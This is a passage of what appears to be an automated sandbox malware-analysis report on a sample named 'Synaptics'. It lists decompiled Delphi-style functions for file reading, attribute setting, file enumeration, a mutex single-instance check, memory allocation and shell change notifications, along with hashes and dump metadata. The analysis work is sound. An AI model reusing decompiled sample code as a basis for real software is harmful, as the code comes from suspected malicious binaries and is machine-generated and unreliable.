                                                                                                                                                                                                                            				 *((intOrPtr*)(_t13 + 0x60)) = LoadCursorA(0, 0x7f00);
                                                                                                                                                                                                                            				_t8 = 0xffffffea;
                                                                                                                                                                                                                            				_t12 = 0x49befc;
                                                                                                                                                                                                                            				do {
                                                                                                                                                                                                                            					if(_t8 < 0xffffffef || _t8 > 0xfffffff4) {
                                                                                                                                                                                                                            						if(_t8 != 0xffffffeb) {
                                                                                                                                                                                                                            							_t11 = 0;
                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                            							goto L4;
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                            						L4:
                                                                                                                                                                                                                            						_t11 =  *0x49e668; // 0x400000
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					_t5 = LoadCursorA(_t11,  *_t12); // executed
                                                                                                                                                                                                                            					_t7 = E0045843C(_t13, _t5, _t8);
                                                                                                                                                                                                                            					_t8 = _t8 + 1;
                                                                                                                                                                                                                            					_t12 =  &(_t12[1]);
                                                                                                                                                                                                                            				} while (_t8 != 0xffffffff);
                                                                                                                                                                                                                            				return _t7;
                                                                                                                                                                                                                            			}










                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CursorLoad
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3238433803-0
                                                                                                                                                                                                                            • Opcode ID: bf689adfd6e98978778aa1b4e9e96d131d583808497e92ae72d4c8abb297034b
                                                                                                                                                                                                                            • Instruction ID: e70e3c34bb26c70f92347ae4735de209fc646f551b3d90022d55a82ec6438589
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: bf689adfd6e98978778aa1b4e9e96d131d583808497e92ae72d4c8abb297034b
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: EFF08261B04204579A20563E5CC1A7E7288DBD6B36B60033FFD39E77D2CF2E6C46425A
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E00402CC2(void** __eax) {
                                                                                                                                                                                                                            				int _t13;
                                                                                                                                                                                                                            				long _t15;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				__eax[4] = 0;
                                                                                                                                                                                                                            				__eax[3] = 0;
                                                                                                                                                                                                                            				_t13 = ReadFile( *__eax, __eax[5], __eax[2],  &(__eax[4]), 0); // executed
                                                                                                                                                                                                                            				if(_t13 != 0) {
                                                                                                                                                                                                                            					return 0;
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				_t15 = GetLastError();
                                                                                                                                                                                                                            				if(_t15 != 0x6d) {
                                                                                                                                                                                                                            					return _t15;
                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                            					return 0;
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            			}






                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • ReadFile.KERNEL32(?,?,?,?,00000000), ref: 00402CE2
                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,00000000), ref: 00402CEB
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: ErrorFileLastRead
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 1948546556-0
                                                                                                                                                                                                                            • Opcode ID: 2722b77db616b9ec834f1696af52551899f9073d62fedd3e8687356533fa5bef
                                                                                                                                                                                                                            • Instruction ID: 4e4afa64d6ce4905370910369685084fd00da3edce78af6e671044812be54073
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2722b77db616b9ec834f1696af52551899f9073d62fedd3e8687356533fa5bef
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A4E075B16142005FEF80DEB989C0A5777DCAB08214B0448B6B908DA286E278D8509B25
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E00409A90(void* __eax, long __edx) {
                                                                                                                                                                                                                            				int _t4;
                                                                                                                                                                                                                            				long _t7;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t7 = 0;
                                                                                                                                                                                                                            				_t4 = SetFileAttributesA(E00404E80(__eax), __edx); // executed
                                                                                                                                                                                                                            				if(_t4 == 0) {
                                                                                                                                                                                                                            					_t7 = GetLastError();
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				return _t7;
                                                                                                                                                                                                                            			}






                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • SetFileAttributesA.KERNEL32(00000000,00000006,00000000,?,00000000,00476826,?,00476888,?,00476888,00000000,00000000,0000000A,KBHKS,?,00476888), ref: 00409AA2
                                                                                                                                                                                                                            • GetLastError.KERNEL32(00000000,00000006,00000000,?,00000000,00476826,?,00476888,?,00476888,00000000,00000000,0000000A,KBHKS,?,00476888), ref: 00409AAB
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: AttributesErrorFileLast
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 1799206407-0
                                                                                                                                                                                                                            • Opcode ID: 675699e61b058174247cfbc6a9f31fc6273980f5e3cf600b71198e92341230a6
                                                                                                                                                                                                                            • Instruction ID: a8da59a57bdf58849924320cc2d236a07249c13e055f30f78d96cafe0e5643bb
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 675699e61b058174247cfbc6a9f31fc6273980f5e3cf600b71198e92341230a6
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: ABD0C9627051202A961065FF2C8195B818D8ED55A9301427FBA08E3292E568DC0A01BA
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E00409B6C(WORD* __eax) {
                                                                                                                                                                                                                            				int _t6;
                                                                                                                                                                                                                            				WORD* _t10;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t10 = __eax;
                                                                                                                                                                                                                            				_t6 = FindNextFileA( *(__eax + 0x14), __eax + 0x18); // executed
                                                                                                                                                                                                                            				if(_t6 == 0) {
                                                                                                                                                                                                                            					return GetLastError();
                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                            					return E00409AB8(_t10);
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            			}






                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • FindNextFileA.KERNEL32(?,?,?,0047614C,?,004761F4,?), ref: 00409B77
                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,0047614C,?,004761F4,?), ref: 00409B89
                                                                                                                                                                                                                              • Part of subcall function 00409AB8: FileTimeToLocalFileTime.KERNEL32(?), ref: 00409AE5
                                                                                                                                                                                                                              • Part of subcall function 00409AB8: FileTimeToDosDateTime.KERNEL32 ref: 00409AF4
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: FileTime$DateErrorFindLastLocalNext
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2103556486-0
                                                                                                                                                                                                                            • Opcode ID: 56d7e7a648cf0da11fd84696b73b02b24197c58a4e3c26e867bebf2357675fe8
                                                                                                                                                                                                                            • Instruction ID: 3ffd322738bc3e6d8a1a454ad62afb9dcd57891a573725529f03bbabbe8ea297
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 56d7e7a648cf0da11fd84696b73b02b24197c58a4e3c26e867bebf2357675fe8
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7DC012A270010457CF04BEFA6CC1957229C1A482143800977BD00DA283EA3CEC5497A5
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 60%
                                                                                                                                                                                                                            			E0047423C(char __eax, void* __ebx, char __edx, void* __esi, void* __eflags) {
                                                                                                                                                                                                                            				char _v8;
                                                                                                                                                                                                                            				char _v9;
                                                                                                                                                                                                                            				void* _t13;
                                                                                                                                                                                                                            				intOrPtr _t25;
                                                                                                                                                                                                                            				void* _t27;
                                                                                                                                                                                                                            				void* _t30;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_v9 = __edx;
                                                                                                                                                                                                                            				_v8 = __eax;
                                                                                                                                                                                                                            				E00404E70(_v8);
                                                                                                                                                                                                                            				_push(_t30);
                                                                                                                                                                                                                            				_push(0x4742ac);
                                                                                                                                                                                                                            				_push( *[fs:eax]);
                                                                                                                                                                                                                            				 *[fs:eax] = _t30 + 0xfffffff8;
                                                                                                                                                                                                                            				_t13 = E00406F90(0, 0xffffffff, E00404E80(_v8)); // executed
                                                                                                                                                                                                                            				_t27 = _t13;
                                                                                                                                                                                                                            				if(GetLastError() != 0xb7) {
                                                                                                                                                                                                                            					if(_t27 != 0 && _v9 == 0) {
                                                                                                                                                                                                                            						CloseHandle(_t27);
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				_pop(_t25);
                                                                                                                                                                                                                            				 *[fs:eax] = _t25;
                                                                                                                                                                                                                            				_push(E004742B3);
                                                                                                                                                                                                                            				return E004049C0( &_v8);
                                                                                                                                                                                                                            			}










                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                              • Part of subcall function 00406F90: CreateMutexA.KERNEL32(?,004742AD,004742AC,?,00474274,00000000,000000FF,00000000,00000000,004742AC), ref: 00406FA6
                                                                                                                                                                                                                            • GetLastError.KERNEL32(00000000,000000FF,00000000,00000000,004742AC,?,?,021E2354), ref: 00474276
                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,00000000,000000FF,00000000,00000000,004742AC,?,?,021E2354), ref: 00474291
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CloseCreateErrorHandleLastMutex
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 4294037311-0
                                                                                                                                                                                                                            • Opcode ID: 4160aa1df04b9819d5f377a9b135ecbcdee02ee1817cb19089dfddf0ff975d72
                                                                                                                                                                                                                            • Instruction ID: 318a60ea147540a6397c20476c41d700bab3d71984a2db83ba3ffa28fcbaf965
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4160aa1df04b9819d5f377a9b135ecbcdee02ee1817cb19089dfddf0ff975d72
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3BF0F970908204AEDB11EAE59903AAF77DC9B95364F1242BBF808B22D2DB7C5D10819E
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E004015B4(void* __eax, void** __edx) {
                                                                                                                                                                                                                            				void* _t3;
                                                                                                                                                                                                                            				void** _t8;
                                                                                                                                                                                                                            				void* _t11;
                                                                                                                                                                                                                            				long _t14;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t8 = __edx;
                                                                                                                                                                                                                            				if(__eax >= 0x100000) {
                                                                                                                                                                                                                            					_t14 = __eax + 0x0000ffff & 0xffff0000;
                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                            					_t14 = 0x100000;
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				_t8[1] = _t14;
                                                                                                                                                                                                                            				_t3 = VirtualAlloc(0, _t14, 0x2000, 1); // executed
                                                                                                                                                                                                                            				_t11 = _t3;
                                                                                                                                                                                                                            				 *_t8 = _t11;
                                                                                                                                                                                                                            				if(_t11 != 0) {
                                                                                                                                                                                                                            					_t3 = E00401468(0x49e5ec, _t8);
                                                                                                                                                                                                                            					if(_t3 == 0) {
                                                                                                                                                                                                                            						VirtualFree( *_t8, 0, 0x8000);
                                                                                                                                                                                                                            						 *_t8 = 0;
                                                                                                                                                                                                                            						return 0;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				return _t3;
                                                                                                                                                                                                                            			}








                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • VirtualAlloc.KERNEL32(00000000,?,00002000,00000001,?,?,?,004018BD), ref: 004015E3
                                                                                                                                                                                                                            • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001,?,?,?,004018BD), ref: 0040160A
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Virtual$AllocFree
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2087232378-0
                                                                                                                                                                                                                            • Opcode ID: 09bf80b8dcbbe8d54fbffc4de11ae3cf3638ee828764dcdda864e46b8a351136
                                                                                                                                                                                                                            • Instruction ID: 653e09eb2cf8d2b73dae0cb6bd44d4e3f867a6d1f4cfde1ef7f913290877d0a1
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 09bf80b8dcbbe8d54fbffc4de11ae3cf3638ee828764dcdda864e46b8a351136
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: FEF02772F003202BEB3059AA4CC1B535AC49F857A4F194076FD08FF3E9D6B58C0142A9
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 68%
                                                                                                                                                                                                                            			E0045E750(intOrPtr __eax, void* __ecx) {
                                                                                                                                                                                                                            				intOrPtr _v8;
                                                                                                                                                                                                                            				intOrPtr _v12;
                                                                                                                                                                                                                            				intOrPtr _t81;
                                                                                                                                                                                                                            				intOrPtr _t118;
                                                                                                                                                                                                                            				intOrPtr _t131;
                                                                                                                                                                                                                            				signed int _t134;
                                                                                                                                                                                                                            				intOrPtr _t141;
                                                                                                                                                                                                                            				void* _t151;
                                                                                                                                                                                                                            				void* _t152;
                                                                                                                                                                                                                            				signed int _t155;
                                                                                                                                                                                                                            				void* _t157;
                                                                                                                                                                                                                            				void* _t159;
                                                                                                                                                                                                                            				intOrPtr _t160;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t81 = __eax;
                                                                                                                                                                                                                            				_t157 = _t159;
                                                                                                                                                                                                                            				_t160 = _t159 + 0xfffffff8;
                                                                                                                                                                                                                            				_v8 = __eax;
                                                                                                                                                                                                                            				if( *0x49c080 == 0) {
                                                                                                                                                                                                                            					L48:
                                                                                                                                                                                                                            					return _t81;
                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                            					_t81 = _v8;
                                                                                                                                                                                                                            					if( *((intOrPtr*)(_t81 + 0xd6)) != 0) {
                                                                                                                                                                                                                            						goto L48;
                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                            						_t134 = 0;
                                                                                                                                                                                                                            						if( *((short*)(_v8 + 0x34)) != 0) {
                                                                                                                                                                                                                            							_t134 = 0x8000000;
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						if( *((short*)(_v8 + 0x3c)) != 0) {
                                                                                                                                                                                                                            							_t134 = _t134 | 0x00000800;
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						if( *((short*)(_v8 + 0x44)) != 0) {
                                                                                                                                                                                                                            							_t134 = _t134 | 0x00000002;
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						if( *((short*)(_v8 + 0x4c)) != 0) {
                                                                                                                                                                                                                            							_t134 = _t134 | 0x00000004;
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						if( *((short*)(_v8 + 0x54)) != 0) {
                                                                                                                                                                                                                            							_t134 = _t134 | 0x00000100;
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						if( *((short*)(_v8 + 0x5c)) != 0) {
                                                                                                                                                                                                                            							_t134 = _t134 | 0x00010000;
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						if( *((short*)(_v8 + 0x64)) != 0) {
                                                                                                                                                                                                                            							_t134 = _t134 | 0x00000080;
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						if( *((short*)(_v8 + 0x6c)) != 0) {
                                                                                                                                                                                                                            							_t134 = _t134 | 0x00040000;
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						if( *((short*)(_v8 + 0x74)) != 0) {
                                                                                                                                                                                                                            							_t134 = _t134 | 0x00000020;
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						if( *((short*)(_v8 + 0x7c)) != 0) {
                                                                                                                                                                                                                            							_t134 = _t134 | 0x00000040;
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						if( *((short*)(_v8 + 0x84)) != 0) {
                                                                                                                                                                                                                            							_t134 = _t134 | 0x00000008;
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						if( *((short*)(_v8 + 0x8c)) != 0) {
                                                                                                                                                                                                                            							_t134 = _t134 | 0x00000200;
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						if( *((short*)(_v8 + 0x94)) != 0) {
                                                                                                                                                                                                                            							_t134 = _t134 | 0x00000400;
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						if( *((short*)(_v8 + 0x9c)) != 0) {
                                                                                                                                                                                                                            							_t134 = _t134 | 0x00020000;
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						if( *((short*)(_v8 + 0xa4)) != 0) {
                                                                                                                                                                                                                            							_t134 = _t134 | 0x00000001;
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						if( *((short*)(_v8 + 0xac)) != 0) {
                                                                                                                                                                                                                            							_t134 = _t134 | 0x00000010;
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						if( *((short*)(_v8 + 0xb4)) != 0) {
                                                                                                                                                                                                                            							_t134 = _t134 | 0x00004000;
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						if( *((short*)(_v8 + 0xbc)) != 0) {
                                                                                                                                                                                                                            							_t134 = _t134 | 0x00001000;
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						if( *((short*)(_v8 + 0xc4)) != 0) {
                                                                                                                                                                                                                            							_t134 = _t134 | 0x00008000;
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						_t81 = _v8;
                                                                                                                                                                                                                            						if( *((short*)(_t81 + 0xcc)) != 0) {
                                                                                                                                                                                                                            							_t134 = _t134 | 0x00002000;
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						if(_t134 == 0) {
                                                                                                                                                                                                                            							goto L48;
                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                            							_t81 =  *((intOrPtr*)(_v8 + 0xea));
                                                                                                                                                                                                                            							if( *((intOrPtr*)(_t81 + 8)) <= 0) {
                                                                                                                                                                                                                            								goto L48;
                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                            								_v12 = E0040275C( *( *((intOrPtr*)(_v8 + 0xea)) + 8) << 3);
                                                                                                                                                                                                                            								_push(_t157);
                                                                                                                                                                                                                            								_push(0x45e9b4);
                                                                                                                                                                                                                            								_push( *[fs:eax]);
                                                                                                                                                                                                                            								 *[fs:eax] = _t160;
                                                                                                                                                                                                                            								_t151 =  *( *((intOrPtr*)(_v8 + 0xea)) + 8) - 1;
                                                                                                                                                                                                                            								if(_t151 >= 0) {
                                                                                                                                                                                                                            									_t152 = _t151 + 1;
                                                                                                                                                                                                                            									_t155 = 0;
                                                                                                                                                                                                                            									do {
                                                                                                                                                                                                                            										 *((intOrPtr*)(_v12 + _t155 * 8)) = E0045D3C8( *((intOrPtr*)(E0041AC6C( *((intOrPtr*)(_v8 + 0xea)), _t155) + 4)), _t155, 0);
                                                                                                                                                                                                                            										_t131 = E0041AC6C( *((intOrPtr*)(_v8 + 0xea)), _t155);
                                                                                                                                                                                                                            										asm("cmc");
                                                                                                                                                                                                                            										asm("sbb eax, eax");
                                                                                                                                                                                                                            										 *((intOrPtr*)(_v12 + 4 + _t155 * 8)) = _t131;
                                                                                                                                                                                                                            										_t155 = _t155 + 1;
                                                                                                                                                                                                                            										_t152 = _t152 - 1;
                                                                                                                                                                                                                            									} while (_t152 != 0);
                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                            								_t118 =  *0x49c080( *((intOrPtr*)(_v8 + 0xda)), 3, _t134,  *((intOrPtr*)(_v8 + 0xd2)),  *( *((intOrPtr*)(_v8 + 0xea)) + 8), _v12); // executed
                                                                                                                                                                                                                            								 *((intOrPtr*)(_v8 + 0xd6)) = _t118;
                                                                                                                                                                                                                            								_pop(_t141);
                                                                                                                                                                                                                            								 *[fs:eax] = _t141;
                                                                                                                                                                                                                            								_push(0x45e9bb);
                                                                                                                                                                                                                            								return E0040277C(_v12);
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            			}
















                                                                                                                                                                                                                            0x0045e8be
                                                                                                                                                                                                                            0x0045e8c6
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0045e8cc
                                                                                                                                                                                                                            0x0045e8cf
                                                                                                                                                                                                                            0x0045e8d9
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0045e8df
                                                                                                                                                                                                                            0x0045e8f3
                                                                                                                                                                                                                            0x0045e8f8
                                                                                                                                                                                                                            0x0045e8f9
                                                                                                                                                                                                                            0x0045e8fe
                                                                                                                                                                                                                            0x0045e901
                                                                                                                                                                                                                            0x0045e910
                                                                                                                                                                                                                            0x0045e913
                                                                                                                                                                                                                            0x0045e915
                                                                                                                                                                                                                            0x0045e916
                                                                                                                                                                                                                            0x0045e918
                                                                                                                                                                                                                            0x0045e933
                                                                                                                                                                                                                            0x0045e941
                                                                                                                                                                                                                            0x0045e94a
                                                                                                                                                                                                                            0x0045e94b
                                                                                                                                                                                                                            0x0045e950
                                                                                                                                                                                                                            0x0045e954
                                                                                                                                                                                                                            0x0045e955
                                                                                                                                                                                                                            0x0045e955
                                                                                                                                                                                                                            0x0045e918
                                                                                                                                                                                                                            0x0045e980
                                                                                                                                                                                                                            0x0045e989
                                                                                                                                                                                                                            0x0045e991
                                                                                                                                                                                                                            0x0045e994
                                                                                                                                                                                                                            0x0045e997
                                                                                                                                                                                                                            0x0045e9b3
                                                                                                                                                                                                                            0x0045e9b3
                                                                                                                                                                                                                            0x0045e8d9
                                                                                                                                                                                                                            0x0045e8c6
                                                                                                                                                                                                                            0x0045e773

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • SHChangeNotifyRegister.SHELL32(?,00000003,00000000,?,00000000,00000000), ref: 0045E980
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: ChangeNotifyRegister
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2496720357-0
                                                                                                                                                                                                                            • Opcode ID: f24e7b66ea0324b3ee4482eb3eb50e10ec0849d43da89b57ff4719544de0bf0d
                                                                                                                                                                                                                            • Instruction ID: f0d6c2aca2f313063b58c8eb8d36d93d0d95f6167d0470ee0e7879a3adb86f1a
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f24e7b66ea0324b3ee4482eb3eb50e10ec0849d43da89b57ff4719544de0bf0d
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2371D134A00204DFE715DB99C188F9977F6EB04305F5580E5E904AB3E2D3B9AF88DB94
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E0043C1FC(intOrPtr* __eax, signed int* __edx) {
                                                                                                                                                                                                                            				signed int _v12;
                                                                                                                                                                                                                            				short _v14;
                                                                                                                                                                                                                            				char _v16;
                                                                                                                                                                                                                            				signed int _v20;
                                                                                                                                                                                                                            				intOrPtr* _v24;
                                                                                                                                                                                                                            				char _v280;
                                                                                                                                                                                                                            				signed int _t39;
                                                                                                                                                                                                                            				signed int _t40;
                                                                                                                                                                                                                            				signed int _t46;
                                                                                                                                                                                                                            				intOrPtr* _t47;
                                                                                                                                                                                                                            				signed int _t50;
                                                                                                                                                                                                                            				signed int _t53;
                                                                                                                                                                                                                            				intOrPtr _t55;
                                                                                                                                                                                                                            				intOrPtr _t56;
                                                                                                                                                                                                                            				signed int _t67;
                                                                                                                                                                                                                            				signed int _t68;
                                                                                                                                                                                                                            				void* _t73;
                                                                                                                                                                                                                            				signed int* _t79;
                                                                                                                                                                                                                            				intOrPtr _t90;
                                                                                                                                                                                                                            				intOrPtr* _t96;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t79 = __edx;
                                                                                                                                                                                                                            				_t96 = __eax;
                                                                                                                                                                                                                            				if(( *(__eax + 0x1c) & 0x00000010) == 0) {
                                                                                                                                                                                                                            					L4:
